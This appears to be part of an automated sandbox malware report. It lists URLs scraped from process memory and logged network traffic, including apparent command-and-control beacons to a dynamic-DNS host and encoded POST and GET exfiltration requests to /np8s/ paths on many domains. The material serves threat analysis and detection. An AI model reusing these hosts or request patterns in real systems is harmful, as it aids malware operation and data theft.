Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQppZiAo
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1
Source: wscript.exe, 00000002.00000003.896542475.0000015597A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896087228.0000015597A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreG
Source: wscript.exe, 00000009.00000002.955051076.000002A0FC2F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreG1C
Source: wscript.exe, 00000007.00000003.773058007.0000019175C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreHGG
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreI
Source: wscript.exe, 00000007.00000003.774092404.0000019175C88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773130942.0000019175C83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreITL
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrm
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.799097708.000002A0FC3C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798949584.000002A0FC3BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966615187.000002A0FC3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM:
Source: wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMF
Source: wscript.exe, 00000009.00000002.972932842.000002A0FE300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMpN
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMs&
Source: wscript.exe, 00000002.00000003.896415401.0000015597A51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMw
Source: wscript.exe, 00000005.00000003.754939043.000002CA057A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.964582567.000002CA03739000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreP
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreR
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrJ
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuJ
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duum
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredmFyIGN0
Source: wscript.exe, 00000007.00000003.938446628.0000019173A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938737820.0000019173A76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938565002.0000019173A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938264988.0000019173A54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961784713.0000019173A77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938676812.0000019173A67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreeX9
Source: wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrei
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrel
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrentWW
Source: wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.774305004.0000019173A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2
Source: wscript.exe, 00000005.00000003.755644912.000002CA03755000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755692263.000002CA0376A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter22
Source: wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2Pac
Source: wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoX&B
Source: wscript.exe, 00000005.00000003.755185989.000002CA0572D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreoft.XMLHTTPll
Source: wscript.exe, 00000009.00000003.799097708.000002A0FC3C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798949584.000002A0FC3BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreox
Source: wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrep
Source: wscript.exe, 00000005.00000003.919796248.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921213700.000002CA0376A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrer:
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vret
Source: wscript.exe, 00000009.00000002.973024572.000002A0FE375000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrets
Source: wscript.exe, 00000005.00000002.964582567.000002CA03739000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrew
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrext10
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre~
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpHg9s
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpr2
Source: rundll32.exe, 0000000D.00000002.1037944488.000000000505B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ratebill.com
Source: rundll32.exe, 0000000D.00000002.1037944488.000000000505B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ratebill.com/np8s/
Source: explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: explorer.exe, 00000004.00000000.511552982.000000000813C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: explorer.exe, 00000004.00000000.477200448.00000000081D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.537643218.00000000081D3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: explorer.exe, 00000004.00000000.476914061.000000000818D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: explorer.exe, 00000004.00000000.537134730.000000000813C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.537519128.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.476053409.000000000813C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.512260933.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.476914061.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.511552982.000000000813C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: explorer.exe, 00000004.00000000.476577870.0000000008172000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.536743740.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: explorer.exe, 00000004.00000000.517717240.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.474624274.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540526960.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.572487291.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: explorer.exe, 00000004.00000000.517717240.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540526960.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.572487291.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1H
Source: explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.487873413.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: wscript.exe, 00000002.00000003.896415401.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703701326.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755001537.000002CA056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773742708.0000019175BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: explorer.exe, 00000004.00000000.476577870.0000000008172000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: explorer.exe, 00000004.00000000.536624812.0000000007FFF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/whois
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/whois?currency=SEK&lang=sv
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domeneshop.no/whois
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/92
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/iehposignin141sntEs
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.475980973.000000000811E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: explorer.exe, 00000004.00000000.614262773.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.614755248.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.524881667.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.488060173.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.487873413.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 00000004.00000000.488060173.0000000000F04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0m
Source: explorer.exe, 00000004.00000000.474624274.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0ytFd.
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 6a 54 34 6d 34 78 55 56 49 6a 61 73 47 34 71 30 72 6c 77 6d 4a 77 72 34 4a 34 34 74 39 4d 76 34 4b 57 39 74 39 4e 74 79 31 52 38 31 78 74 34 39 46 58 46 37 45 76 32 70 58 42 30 28 41 74 37 69 4b 36 71 49 56 6d 76 39 73 4d 53 73 6e 41 6f 70 2d 56 39 53 42 76 38 56 6d 62 59 35 51 63 55 28 2d 69 69 4b 52 56 62 47 6c 51 6d 4e 68 38 31 4d 4d 43 69 4e 57 39 79 63 45 66 74 49 6e 7e 31 6a 7a 49 58 69 73 76 52 77 69 42 55 49 35 61 67 4c 73 65 51 42 38 72 6d 32 74 66 31 4e 69 62 63 33 2d 4a 73 33 76 37 70 36 4e 43 2d 4f 33 37 67 69 6f 54 58 5a 53 5a 55 7a 5a 35 4e 75 72 72 74 39 4e 31 73 6d 52 32 7a 49 38 44 31 4b 4d 46 31 6f 44 4b 4a 42 6f 54 76 7e 31 70 57 45 35 37 32 42 6e 58 79 67 69 79 73 53 50 4e 42 54 5f 6b 43 6d 51 55 37 54 7a 79 6d 69 47 4c 79 7a 36 76 2d 77 38 52 5f 69 64 4b 54 6f 4e 36 4d 6f 5f 45 32 33 4c 50 4e 31 62 47 73 58 4d 4e 6b 4f 50 67 57 32 69 6a 6c 70 51 77 2d 6e 50 39 51 36 48 68 72 63 50 77 6f 53 41 71 74 6f 37 62 64 44 71 56 50 35 74 30 49 6b 56 67 31 41 36 48 4d 73 7a 59 6d 55 38 4a 66 30 43 66 38 52 59 6e 76 64 62 6a 78 47 77 72 4b 41 6b 49 7a 6f 6b 41 6f 4c 6d 39 59 49 34 67 5f 4c 79 41 34 76 4f 55 52 39 4f 75 58 44 32 7a 79 53 51 78 4a 46 47 6d 48 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
zVB=S9TWzjT4m4xUVIjasG4q0rlwmJwr4J44t9Mv4KW9t9Nty1R81xt49FXF7Ev2pXB0(At7iK6qIVmv9sMSsnAop-V9SBv8VmbY5QcU(-iiKRVbGlQmNh81MMCiNW9ycEftIn~1jzIXisvRwiBUI5agLseQB8rm2tf1Nibc3-Js3v7p6NC-O37gioTXZSZUzZ5Nurrt9N1smR2zI8D1KMF1oDKJBoTv~1pWE572BnXygiysSPNBT_kCmQU7TzymiGLyz6v-w8R_idKToN6Mo_E23LPN1bGsXMNkOPgW2ijlpQw-nP9Q6HhrcPwoSAqto7bdDqVP5t0IkVg1A6HMszYmU8Jf0Cf8RYnvdbjxGwrKAkIzokAoLm9YI4g_LyA4vOUR9OuXD2zySQxJFGmHsg).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&4hM4=o4B0f HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvIMnAXbQu1P/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs1G32f+Ix1mc&4hM4=o4B0f HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=/pe3of3KthlHX+AZdE40oBjh24oMUm2DhTWzf9+6lBsOaTWyqOSb4stDRDmzQmtt1180&4hM4=o4B0f HTTP/1.1Host: www.halecamilla.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
